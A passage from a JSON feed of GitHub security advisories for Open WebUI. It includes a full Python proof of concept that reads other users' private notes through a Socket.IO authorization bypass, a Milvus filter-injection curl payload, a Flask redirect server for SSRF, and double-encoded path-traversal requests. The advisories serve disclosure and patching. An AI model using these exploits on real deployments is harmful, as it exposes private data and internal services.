note, the Yjs document is stored under the normalized key. An attacker can then request the same document using the underscore variant, which skips the `startswith(\"note:\")` authorization check but retrieves the same data from `YdocManager`.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nuv run --no-project --with requests --with \"python-socketio[asyncio_client]\" --with aiohttp --with pycrdt finding_15_yjs_note_disclosure.py --base-url BASE_URL --attacker-email EMAIL --attacker-password PASS --victim-email EMAIL --victim-password PASS\n\nFinding #15 — Any authenticated user can read other users' private notes via Socket.IO\n\nSUMMARY:\n  The ydoc:document:join Socket.IO handler only checks authorization for\n  document IDs starting with \"note:\" (colon). However, YdocManager normalizes\n  document IDs by replacing colons with underscores internally. An attacker\n  can join a room using \"note_\u003cid\u003e\" (underscore) to bypass the auth check,\n  while still accessing the same underlying Yjs document as \"note:\u003cid\u003e\".\n  Then ydoc:document:state returns the full document content.\n\nVULNERABLE CODE:\n  backend/open_webui/socket/main.py, ydoc:document:join:\n    if document_id.startswith(\"note:\"):\n        # permission check only for colon-prefix\n    # \"note_\u003cid\u003e\" skips this check entirely\n\n  backend/open_webui/socket/ydoc.py, YdocManager:\n    key = document_id.replace(\":\", \"_\")  # normalizes to same storage key\n\nIMPACT:\n  Any authenticated user can read the full content of any other user's notes\n  by exploiting the namespace collision between \"note:\" and \"note_\" prefixes.\n\nREPRODUCTION:\n  1. Victim creates a private note with sensitive content.\n  2. Attacker connects via Socket.IO and authenticates.\n  3. Attacker joins room with document_id \"note_\u003cvictim_note_id\u003e\" (underscore).\n  4. Attacker requests ydoc:document:state to get the full note content.\n\nREQUIREMENTS:\n  - Running Open WebUI instance\n  - A victim note with content\n  - Attacker user (any authenticated user)\n\"\"\"\n\nimport argparse\nimport asyncio\nimport sys\nimport requests\nimport socketio\n\n\nasync def victim_initialize_note(base, victim_token, note_id):\n    \"\"\"Simulate victim opening the note in the UI to initialize the Yjs document.\"\"\"\n    sio = socketio.AsyncClient()\n\n    await sio.connect(\n        base,\n        socketio_path=\"/ws/socket.io\",\n        headers={\"Authorization\": f\"Bearer {victim_token}\"},\n        transports=[\"websocket\"],\n    )\n\n    # Join using the proper note:id format (passes auth check since victim owns it)\n    doc_id = f\"note:{note_id}\"\n    print(f\"    Joining as victim with document_id: {doc_id}\")\n\n    await sio.emit(\"ydoc:document:join\", {\n        \"document_id\": doc_id,\n        \"user_id\": \"victim\",\n        \"user_name\": \"Victim\",\n    })\n    await asyncio.sleep(1)\n\n    # Send a Yjs update with the note content\n    # Create a simple Yjs document with text content\n    try:\n        import pycrdt as Y\n        ydoc = Y.Doc()\n        ytext = ydoc.get(\"default\", type=Y.Text)\n        with ydoc.transaction():\n            ytext += \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\"\n        update = ydoc.get_update()\n\n        await sio.emit(\"ydoc:document:update\", {\n            \"document_id\": doc_id,\n            \"update\": list(update),\n        })\n        print(f\"    Sent Yjs update with note content ({len(update)} bytes)\")\n    except ImportError:\n        # If pycrdt not available, try y-py\n        try:\n            import y_py as Y\n            ydoc = Y.YDoc()\n            ytext = ydoc.get_text(\"default\")\n            with ydoc.begin_transaction() as txn:\n                ytext.extend(txn, \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\")\n            update = txn.get_update()\n\n            await sio.emit(\"ydoc:document:update\", {\n                \"document_id\": doc_id,\n                \"update\": list(update),\n            })\n            print(f\"    Sent Yjs update with note content ({len(update)} bytes)\")\n        except ImportError:\n            print(\"    WARNING: Neither pycrdt nor y-py available, sending raw text marker\")\n            # Send a minimal marker that we can detect\n            raw_update = list(b\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00SECRET_NOTE_CONTENT_MARKER\")\n            await sio.emit(\"ydoc:document:update\", {\n                \"document_id\": doc_id,\n                \"update\": raw_update,\n            })\n\n    await asyncio.sleep(1)\n    await sio.disconnect()\n    print(f\"    Victim disconnected\")\n\n\nasync def exploit(base, attacker_token, victim_note_id):\n    sio = socketio.AsyncClient()\n    result = {\"state\": None, \"error\": None, \"joined\": False}\n\n    @sio.on(\"ydoc:document:state\")\n    async def on_state(data):\n        result[\"state\"] = data\n        print(f\"    [!] Received ydoc:document:state event!\")\n        print(f\"        document_id: {data.get('document_id', '?')}\")\n        state = data.get(\"state\", [])\n        print(f\"        State size: {len(state)} bytes\")\n\n    @sio.on(\"error\")\n    async def on_error(data):\n        result[\"error\"] = data\n        print(f\"    [!] Error event: {data}\")\n\n    @sio.on(\"*\")\n    async def catch_all(event, data):\n        if event not in (\"ydoc:document:state\", \"error\"):\n            print(f\"    [debug] Event: {event} Data: {str(data)[:200]}\")\n\n    # Connect with auth token\n    print(f\"[*] Connecting as attacker to Socket.IO...\")\n    await sio.connect(\n        base,\n        socketio_path=\"/ws/socket.io\",\n        auth={\"token\": attacker_token},\n        transports=[\"websocket\"],\n    )\n\n    # Join with \"note_\" prefix (underscore — bypasses auth)\n    bypass_doc_id = f\"note_{victim_note_id}\"\n    print(f\"\\n[*] Step 3: Joining room with bypassed document_id: {bypass_doc_id}\")\n    print(f\"    (using underscore instead of colon to skip auth check)\")\n\n    await sio.emit(\"ydoc:document:join\", {\n        \"document_id\": bypass_doc_id,\n        \"user_id\": \"attacker\",\n        \"user_name\": \"Attacker\",\n    })\n\n    result[\"joined\"] = True\n\n    # Wait for state response (from join handler's emit)\n    for _ in range(20):\n        await asyncio.sleep(0.5)\n        if result[\"state\"]:\n            break\n\n    await sio.disconnect()\n    return result\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Finding #15: Yjs note disclosure via namespace collision\")\n    parser.add_argument(\"--base-url\", required=True)\n    parser.add_argument(\"--attacker-email\", required=True)\n    parser.add_argument(\"--attacker-password\", required=True)\n    parser.add_argument(\"--victim-email\", required=True)\n    parser.add_argument(\"--victim-password\", required=True)\n    args = parser.parse_args()\n\n    base = args.base_url.rstrip(\"/\")\n\n    # ── Step 1: Login as victim and find their note ──\n    print(\"[*] Authenticating as victim...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.victim_email, \"password\": args.victim_password})\n    if not r.ok:\n        print(f\"[-] Victim login failed: {r.status_code}\")\n        sys.exit(1)\n    victim_token = r.json()[\"token\"]\n    victim_id = r.json()[\"id\"]\n    print(f\"[+] Logged in as victim (id={victim_id})\")\n\n    r = requests.get(f\"{base}/api/v1/notes/\", headers={\"Authorization\": f\"Bearer {victim_token}\"})\n    if not r.ok:\n        print(f\"[-] Failed to list victim notes: {r.status_code}\")\n        sys.exit(1)\n    notes = r.json()\n    if isinstance(notes, dict):\n        notes = notes.get(\"items\", notes.get(\"data\", []))\n    if not notes:\n        print(\"[-] No victim notes found\")\n        sys.exit(1)\n    victim_note = notes[0]\n    victim_note_id = victim_note[\"id\"]\n    print(f\"[+] Victim's note: {victim_note.get('title', '?')} (id={victim_note_id})\")\n\n    # ── Step 2: Login as attacker ──\n    print(f\"\\n[*] Authenticating as attacker...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.attacker_email, \"password\": args.attacker_password})\n    if not r.ok:\n        print(f\"[-] Attacker login failed: {r.status_code}\")\n        sys.exit(1)\n    attacker_token = r.json()[\"token\"]\n    attacker_id = r.json()[\"id\"]\n    print(f\"[+] Logged in as attacker (id={attacker_id})\")\n\n    # ── Step 3: Confirm attacker CANNOT read victim's note via API ──\n    print(f\"\\n[*] Step 1: Confirming attacker cannot read victim's note via API...\")\n    r = requests.get(f\"{base}/api/v1/notes/{victim_note_id}\",\n                     headers={\"Authorization\": f\"Bearer {attacker_token}\"})\n    if r.status_code in (401, 403, 404):\n        print(f\"[+] Access correctly DENIED via /api/v1/notes/{victim_note_id} (HTTP {r.status_code})\")\n    else:\n        print(f\"[!] Unexpected: attacker can read note (status {r.status_code})\")\n\n    # ── Step 4 \u0026 5: Victim opens note, attacker reads it concurrently ──\n    async def combined_exploit():\n        # Victim opens note and stays connected\n        print(f\"\\n[*] Step 2: Victim opens note (stays connected)...\")\n        victim_sio = socketio.AsyncClient()\n        await victim_sio.connect(\n            base,\n            socketio_path=\"/ws/socket.io\",\n            auth={\"token\": victim_token},\n            transports=[\"websocket\"],\n        )\n        doc_id = f\"note:{victim_note_id}\"\n        await victim_sio.emit(\"ydoc:document:join\", {\n            \"document_id\": doc_id,\n            \"user_id\": \"victim\",\n            \"user_name\": \"Victim\",\n        })\n        await asyncio.sleep(1)\n\n        # Send Yjs update with note content\n        try:\n            import pycrdt as Y\n            ydoc = Y.Doc()\n            ytext = ydoc.get(\"default\", type=Y.Text)\n            with ydoc.transaction():\n                ytext += \"# Private Notes\\n\\nPassword for production DB: p@ssw0rd_pr0d_2026\\nAWS root account: admin@company.com / SuperSecret!23\\n\\nDo NOT share this with anyone.\"\n            update = ydoc.get_update()\n            await victim_sio.emit(\"ydoc:document:update\", {\n                \"document_id\": doc_id,\n                \"update\": list(update),\n            })\n            print(f\"    Sent Yjs update ({len(update)} bytes)\")\n        except Exception as e:\n            print(f\"    WARNING: Could not create Yjs update: {e}\")\n\n        await asyncio.sleep(1)\n\n        # Now attacker joins while victim is still connected\n        result = await exploit(base, attacker_token, victim_note_id)\n\n        # Clean up victim connection\n        await victim_sio.disconnect()\n        return result\n\n    result = asyncio.run(combined_exploit())\n\n    if not result[\"joined\"]:\n        print(f\"\\n[-] Failed to join document room\")\n        sys.exit(1)\n\n    if result[\"state\"]:\n        state_data = result[\"state\"]\n        state_bytes = bytes(state_data.get(\"state\", []))\n\n        # Try to extract readable text from the Yjs state\n        # Yjs binary format contains the text as embedded strings\n        text_content = \"\"\n        try:\n            # Search for readable ASCII strings in the binary data\n            current_str = \"\"\n            for b in state_bytes:\n                if 32 \u003c= b \u003c 127:\n                    current_str += chr(b)\n                else:\n                    if len(current_str) \u003e 5:\n                        text_content += current_str + \" \"\n                    current_str = \"\"\n            if len(current_str) \u003e 5:\n                text_content += current_str\n        except Exception:\n            pass\n\n        print(f\"\\n[+] Extracted text from Yjs state:\")\n        print(f\"    {text_content[:500]}\")\n\n        # Check for sensitive markers\n        sensitive_markers = [\"p@ssw0rd\", \"SuperSecret\", \"Private Notes\", \"production DB\", \"AWS root\"]\n        found = [m for m in sensitive_markers if m.lower() in text_content.lower()]\n\n        if found:\n            print(f\"\\n[+] SUCCESS: Victim's note content LEAKED via Yjs namespace collision!\")\n            print(f\"    Sensitive markers found: {found}\")\n            print(f\"    The attacker joined room 'doc_note_{victim_note_id}' (underscore)\")\n            print(f\"    which bypasses the auth check (only checks 'note:' colon prefix)\")\n            print(f\"    but accesses the same Yjs document due to normalization.\")\n            sys.exit(0)\n        elif text_content.strip():\n            print(f\"\\n[+] SUCCESS: Note content retrieved (markers may differ)\")\n            print(f\"    Non-empty Yjs state was returned for victim's note.\")\n            sys.exit(0)\n        else:\n            print(f\"\\n[*] Yjs state was returned but could not extract readable text.\")\n            print(f\"    Raw state size: {len(state_bytes)} bytes\")\n            if len(state_bytes) \u003e 10:\n                print(f\"    First 50 bytes: {list(state_bytes[:50])}\")\n                print(f\"[+] SUCCESS: Non-trivial document state returned\")\n                sys.exit(0)\n            sys.exit(1)\n    else:\n        print(f\"\\n[-] No document state received\")\n        print(f\"    The Yjs document may not exist in storage yet.\")\n        print(f\"    Notes must be opened in the UI to create a Yjs document.\")\n        sys.exit(1)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\n\nAny authenticated user can read the full contents of any other user's private notes. Notes are a collaborative editing feature intended for personal or shared use --  private notes may contain sensitive information such as credentials, internal documentation, or personal data. The attacker only needs to know or enumerate the target note's ID.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T18:05:21.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-8788-j68r-3cgh","https://nvd.nist.gov/vuln/detail/CVE-2026-54022","https://github.com/advisories/GHSA-8788-j68r-3cgh","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2712.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-8788-j68r-3cgh","CVE-2026-54022"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T19:00:08.493Z","updated_at":"2026-09-03T03:02:03.254Z","epss_percentage":0.00347,"epss_percentile":0.27504,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Nzg4LWo2OHItM2NnaM4ABY4q","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04Nzg4LWo2OHItM2NnaM4ABY4q","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.11","vulnerable_version_range":"\u003c= 0.8.10"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04Nzg4LWo2OHItM2NnaM4ABY4q/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cnBqLXY3aGYtdnYyd84ABY4p","url":"https://github.com/advisories/GHSA-9rpj-v7hf-vv2w","title":"Open WebUI: Authenticated users can target arbitrary configured Ollama backends via unguarded url_idx path parameter","description":"## Summary\n\nSeveral direct, index-addressed Ollama proxy routes accept a caller-supplied `url_idx`\npath parameter and use it as a raw index into the admin-configured `OLLAMA_BASE_URLS`\nlist. Access control on these routes validates only whether the user may use the\nrequested *model*, never which *backend* the request is routed to. Any authenticated\nuser can append an arbitrary `url_idx` to force their request onto an Ollama backend\nthey were never authorized to reach, including internal, higher-privilege, or\nexplicitly admin-disabled backends.\n\n## Affected endpoints\n\nAll indexed Ollama routes that resolve the backend through `get_ollama_url()`:\n\n```\nPOST /ollama/api/chat/{url_idx}\nPOST /ollama/api/generate/{url_idx}\nPOST /ollama/api/embed/{url_idx}\nPOST /ollama/api/embeddings/{url_idx}\nPOST /ollama/v1/chat/completions/{url_idx}\nPOST /ollama/v1/completions/{url_idx}\nPOST /ollama/v1/messages/{url_idx}\nPOST /ollama/v1/responses/{url_idx}\n```\n\n## Root cause\n\n`backend/open_webui/routers/ollama.py` — `get_ollama_url()` consults the\nmodel-to-backend allow-list (`OLLAMA_MODELS[model][\"urls\"]`) only when `url_idx` is\nomitted. When the caller supplies `url_idx`, that mapping is skipped and the value is\nused directly as an index:\n\n```python\nasync def get_ollama_url(request: Request, model: str, url_idx: Optional[int] = None):\n    if url_idx is None:\n        models = request.app.state.OLLAMA_MODELS\n        if model not in models:\n            raise HTTPException(...)\n        url_idx = random.choice(models[model].get(\"urls\", []))\n    url = request.app.state.config.OLLAMA_BASE_URLS[url_idx]   # caller-controlled, no authz\n    return url, url_idx\n```\n\nThe outbound request is then sent to that backend using the backend's own configured\nAPI key. Backends an admin has disabled (`OLLAMA_API_CONFIGS[\"\u003cidx\u003e\"].enable = false`)\nare hidden from model discovery but remain reachable through the indexed route, because\nthe disabled state is never re-checked at request time.\n\n## Impact\n\nA verified, non-admin user with read access to any single model can:\n- route requests to internal / higher-capability / restricted Ollama backends in\n  multi-backend deployments, bypassing backend-level isolation;\n- reach backends the admin has explicitly disabled;\n- have those requests authenticated with the target backend's configured API key\n  (the key is used server-side; it is not returned to the attacker);\n- consume the restricted backend's compute.\n\nThere is no cross-user data disclosure and no exfiltration of the backend credential\nitself; the impact is unauthorized access to, and use of, restricted backend resources.\n\n## Affected / Patched\n\n- Affected: `\u003c= 0.9.5`\n- Patched: `\u003e= 0.9.6`\n\n## Fix\n\n0.9.6 adds `validate_ollama_backend_idx()`, invoked on every indexed route (directly and\nvia `get_ollama_url()`), which returns 403 for any non-admin caller-supplied `url_idx`\nthat is not in the requested model's allowed `urls`. Because disabled backends are absent\nfrom every model's `urls`, the same check also blocks routing to disabled backends.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T18:01:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-9rpj-v7hf-vv2w","https://nvd.nist.gov/vuln/detail/CVE-2026-54021","https://github.com/advisories/GHSA-9rpj-v7hf-vv2w","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2718.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-9rpj-v7hf-vv2w","CVE-2026-54021"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T19:00:08.493Z","updated_at":"2026-09-03T03:02:03.254Z","epss_percentage":0.00283,"epss_percentile":0.20229,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cnBqLXY3aGYtdnYyd84ABY4p","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cnBqLXY3aGYtdnYyd84ABY4p","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cnBqLXY3aGYtdnYyd84ABY4p/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wNWNwLXI3cmctcXB4Y84ABY4o","url":"https://github.com/advisories/GHSA-p5cp-r7rg-qpxc","title":"Open WebUI: RAG ACL Bypass in Milvus Multitenancy Mode","description":"# RAG ACL Bypass in Milvus Multitenancy Mode\n\n## Summary\n\nThis is a bypass of the fix for:\n\n- GHSA-h36f-rqpx-j5wx\n- CVE-2026-44560\n- \"Unauthorized File and Knowledge Base Content Access via RAG Vector Search\"\n\nOpen WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a `resource_id` and is interpolated into a Milvus expression without escaping.\n\nAn authenticated non-admin user can query:\n\n```text\nx' or resource_id != '' or resource_id == 'x\n```\n\nThis passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:\n\n```text\nresource_id == 'x' or resource_id != '' or resource_id == 'x'\n```\n\nThat returns private knowledge-base chunks belonging to other users.\n\n## Affected Configuration\n\nTested on:\n\n```text\nOpen WebUI: v0.9.5, commit 3660bc00f\nVECTOR_DB=milvus\nENABLE_MILVUS_MULTITENANCY_MODE=true\n```\n\nThis is **not a default-vector-store issue**. It affects **production deployments using Milvus multitenancy.**\n\n## Impact\n\nAn authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.\n\n## Root Cause\n\nACL permits unknown collection names:\n\n```python\n# backend/open_webui/retrieval/utils.py\nelif not await Knowledges.get_knowledge_by_id(name):\n    validated.add(name)\n```\n\nMilvus multitenancy then treats the same name as `resource_id` and builds unsafe expressions:\n\n```python\n# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py\nexpr=f\"{RESOURCE_ID_FIELD} == '{resource_id}'\"\n```\n\nAffected paths include:\n\n```text\nPOST /api/v1/retrieval/query/collection\nPOST /api/v1/retrieval/query/doc\n```\n\n## PoC\n\nRequest:\n\n```bash\ncurl -s -X POST \"$TARGET/api/v1/retrieval/query/collection\" \\\n  -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  --data-binary @- \u003c\u003c'JSON'\n{\n  \"collection_names\": [\n    \"x' or resource_id != '' or resource_id == 'x\"\n  ],\n  \"query\": \"anything\",\n  \"k\": 10,\n  \"hybrid\": false\n}\nJSON\n```\n\nActual result: private chunks from other users' knowledge collections are returned.\n\nExpected result: request should be rejected with 403 or return no unauthorized content.\n\n## Remediation\n\n1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.\n2. Escape or parameterize Milvus expression values before building filters.\n3. Reject collection names containing quotes/control characters unless they match a known internal format.\n4. Add a regression test for this payload in Milvus multitenancy mode:\n\n```text\nx' or resource_id != '' or resource_id == 'x\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T17:57:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-p5cp-r7rg-qpxc","https://nvd.nist.gov/vuln/detail/CVE-2026-54019","https://github.com/advisories/GHSA-p5cp-r7rg-qpxc","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2750.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-p5cp-r7rg-qpxc","CVE-2026-54019"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T18:00:08.591Z","updated_at":"2026-09-03T03:02:03.255Z","epss_percentage":0.00386,"epss_percentile":0.31573,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNWNwLXI3cmctcXB4Y84ABY4o","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wNWNwLXI3cmctcXB4Y84ABY4o","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNWNwLXI3cmctcXB4Y84ABY4o/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qcmZwLW02NGctcGN3ds4ABY4n","url":"https://github.com/advisories/GHSA-jrfp-m64g-pcwv","title":"Open WebUI: SSRF Protection Bypass in Playwright Web Loader via HTTP Redirects","description":"### Summary\nThe SafePlaywrightURLLoader implements a validate_url function to prevent SSRF attacks by checking the IP address of the user-provided URL. However, this validation is performed only on the initial URL.\n\nSince Playwright automatically follows HTTP redirects (301/302) by default, an attacker can bypass the validation by providing a safe URL that redirects to a restricted internal network address (e.g., localhost, Docker container network, or Cloud Metadata).\n\nThis allows the application to access internal services despite ENABLE_RAG_LOCAL_WEB_FETCH being set to False\n\n### Details\nRoot Cause\n\nThe application validates the initial user-provided URL using self._safe_process_url_sync(url). This correctly resolves the domain and ensures it does not point to a private IP.\n\nThe application then calls page.goto(url). By default, Playwright automatically follows HTTP redirects (301/302).\n\nThe Bypass: If the destination server returns a redirect to an internal IP (e.g., 127.0.0.1 or 169.254.169.254), the browser follows it without re-validating the new destination. The initial validation is bypassed because it only checked the first URL, not the entire redirect chain.\n\n```python\nfor url in self.urls:\n    try:\n        self._safe_process_url_sync(url)  \n        page = browser.new_page()\n        response = page.goto(url, timeout=self.playwright_timeout)  #this\n        if response is None:\n            raise ValueError(...)\n        text = self.evaluator.evaluate(page, browser, response)\n```\n\n### PoC\n(This PoC uses Docker to easily demonstrate internal network access (accessing a container by service name). However, the vulnerability is NOT tied to Docker.)\n\n1. Ensure the Open WebUI is configured with the following environment variables. The vulnerability is specific to the Playwright engine.\n2. ENABLE_RAG_LOCAL_WEB_FETCH=False (Default)\n3. RAG_WEB_LOADER_ENGINE=playwright\n4. Setup and run attack server\n5. In Open WebUI, use the \"Web Search\" or \"URL Loader\" feature.\n6. Input the attacker's URL (e.g., http://attacker-ip/).\n\n```python\n# attack_server.py\nfrom flask import Flask, redirect\napp = Flask(__name__)\n\n@app.route('/')\ndef attack():\n    # Redirect to the Open WebUI container's internal port\n    return redirect(\"http://open-webui:8080/api/version\", code=302)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=80)\n```\n\u003cimg width=\"580\" height=\"192\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4600dbb5-a81d-4e58-b787-afe04fe59d6e\" /\u003e\n\nThe Playwright browser follows the redirect to the internal address (http://open-webui:8080/api/version)\n\n### Impact\n+ Cloud Environments: Access to Instance Metadata Service (IMDS) to steal cloud credentials.\n+ Intranet/On-Premise: Scanning internal networks and accessing unauthenticated internal tools.\n+ Container Environments: Accessing other containers within the same network.\n\n### Recommended Patch\nimplement a request interceptor using Playwright's page.route. This ensures all requests, including redirects, are validated before connection.\n\napply the following logic to both lazy_load and alazy_load methods:\n\n```python\n# async context\nasync def intercept_route(route):\n    try:\n        await run_in_threadpool(validate_url, route.request.url)\n        await route.continue_()\n    except Exception:\n        await route.abort()\n\nawait page.route(\"**/*\", intercept_route)\nresponse = await page.goto(url, timeout=self.playwright_timeout)\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T17:55:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jrfp-m64g-pcwv","https://nvd.nist.gov/vuln/detail/CVE-2026-54018","https://github.com/advisories/GHSA-jrfp-m64g-pcwv","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2743.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-jrfp-m64g-pcwv","CVE-2026-54018"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T18:00:08.591Z","updated_at":"2026-09-03T03:02:03.255Z","epss_percentage":0.00386,"epss_percentile":0.31572,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qcmZwLW02NGctcGN3ds4ABY4n","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qcmZwLW02NGctcGN3ds4ABY4n","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qcmZwLW02NGctcGN3ds4ABY4n/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yMndnLTJtY3ItNjZyds4ABY4m","url":"https://github.com/advisories/GHSA-r2wg-2mcr-66rv","title":"Open WebUI: Path traversal / SSRF in terminal server proxy via encoded path traversal","description":"### Summary\n\nThe terminal-server reverse proxy in `backend/open_webui/routers/terminals.py` does not fully confine the user-controlled `path` segment before forwarding it to an admin-configured terminal server. An authenticated user who has been granted access to a terminal server can craft `path` values containing encoded `../` traversal sequences that escape the intended path (or policy) scope on that server, reaching unintended endpoints and files on the terminal-server host. Where the terminal server fans requests out to internal services, this also gives SSRF-style reach into those services.\n\nThis is a separate code path from the `/api/v1/retrieval/process/web` SSRF (GHSA-c6xv-rcvw-v685), with its own input. Two distinct vectors are consolidated here:\n\n1. Raw path forwarding / single-encoded traversal (original report).\n2. A bypass of the subsequently-added `_sanitize_proxy_path` mitigation using double-encoded dots (`%252e%252e`).\n\nThe attacker-controlled input is the request `path`, supplied by the non-admin user, not anything an administrator configures, so this is not an admin-trust / Rule-9 situation.\n\n### Affected code\n\nThe proxy route forwards an arbitrary trailing path to the configured terminal server:\n\n```python\n# routers/terminals.py\n@router.api_route('/{server_id}/{path:path}', methods=PROXY_METHODS)\nasync def proxy_terminal(server_id, path, request, user=Depends(get_verified_user)):\n    ...\n    safe_path = _sanitize_proxy_path(path)\n    if safe_path is None:\n        return JSONResponse({'error': 'Invalid path'}, status_code=400)\n    target_url = f'{base_url}/{safe_path}'\n    policy_id = connection.get('policy_id')\n    if policy_id:\n        target_url = f'{base_url}/p/{policy_id}/{safe_path}'\n```\n\nAccess requires `has_connection_access(user, connection, ...)`, i.e. a non-admin user the administrator has granted to that terminal server.\n\n### Vector 1 — single-encoded traversal (original)\n\nThe path was originally concatenated to the base URL with no sanitization (`target_url = f\"{base_url}/{path}\"`), so single-encoded traversal escaped the intended scope:\n\n```\nGET /api/v1/terminals/server1/..%2F..%2F..%2Finternal-api/secrets\n# proxied to: {base_url}/../../../internal-api/secrets\n```\n\nThis vector is closed at HEAD: `_sanitize_proxy_path` now URL-decodes once, runs `posixpath.normpath`, strips leading slashes, and rejects results beginning with `..` (`unquote('..%2F..%2F') -\u003e '../../' -\u003e normpath -\u003e '../..'` -\u003e rejected).\n\n### Vector 2 — double-encoded bypass of `_sanitize_proxy_path`\n\n`_sanitize_proxy_path` decodes the path only once before the `..` check, so a double-encoded payload survives:\n\n```python\ndef _sanitize_proxy_path(path: str) -\u003e str | None:\n    decoded = unquote(path)                 # single decode pass only\n    normalized = posixpath.normpath(decoded)\n    cleaned = normalized.lstrip('/')\n    if cleaned.startswith('..') or cleaned == '.':\n        return None\n    ...\n```\n\n`unquote('%252e%252e/secret')` yields `%2e%2e/secret` (not `..`), which `normpath` leaves unchanged and which does not start with `..`, so it passes the check. The proxy then forwards `{base_url}/%2e%2e/secret`, and the upstream terminal server decodes `%2e%2e` into `..` and resolves the traversal the check was meant to prevent.\n\n```\nGET /api/v1/terminals/server1/%252e%252e/%252e%252e/sensitive-file\n# passes _sanitize_proxy_path as %2e%2e/%2e%2e/sensitive-file\n# upstream decodes -\u003e ../../sensitive-file\n```\n\nThe `policy_id` form (`{base_url}/p/{policy_id}/{safe_path}`) is the higher-impact target: traversal escapes the policy namespace and reaches other policies or the terminal-server root.\n\n### Impact\n\nAn authenticated user with access to a terminal server can escape the intended path/policy scope on that server, reaching 